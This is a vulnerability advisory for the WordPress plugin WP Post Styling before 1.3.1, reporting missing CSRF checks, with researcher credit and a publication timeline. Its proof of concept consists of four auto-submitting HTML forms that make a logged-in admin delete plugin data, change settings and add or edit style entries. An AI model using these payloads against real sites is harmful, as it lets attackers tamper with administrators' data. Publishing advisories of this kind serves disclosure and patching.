WordPress Plugin Vulnerabilities
WP Post Styling < 1.3.1 - Multiple CSRF
Description
The plugin does not have CSRF checks in various actions, which could allow attackers to make a logged in admin delete plugin's data, update the settings, add new entries and more via CSRF attacks
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling/wp-post-styling.php" method="POST"> <input type="text" name="delete_style" value="1"> <input type="text" name="submit-type" value="library"> <input type="text" name="submit" value="Yes, delete it!"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST"> <input type="text" name="jd-post-styling-screen" value="1"> <input type="text" name="jd-post-styling-default" value="disable"> <input type="text" name="jd-post-styling-library" value="disable"> <input type="text" name="jd-post-styling-boxsize" value="6"> <input type="text" name="submit-type" value="options"> <input type="text" name="submit" value="Save WP Post Styling Options"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php&edit_style=1" method="POST"> <input type="text" name="edit_style" value="1"> <input type="text" name="jd_style_library_name" value="test"> <input type="text" name="jd_style_library_css" value="body {color: blue}"> <input type="text" name="jd_style_library_type" value="screen"> <input type="text" name="submit-type" value="library"> <input type="text" name="submit" value="Update WP Post Styling Library"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST"> <input type="text" name="jd_style_library_name" value="test2"> <input type="text" name="jd_style_library_css" value="body {color: blue}"> <input type="text" name="jd_style_library_type" value="screen"> <input type="text" name="submit-type" value="library"> <input type="text" name="submit" value="Add to WP Post Styling Library"> </form> <script> HTMLFormElement.prototype.submit.call( document.getElementById("test") ); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-31 (about 1 years ago)
Added
2022-05-31 (about 1 years ago)
Last Updated
2023-02-27 (about 1 years ago)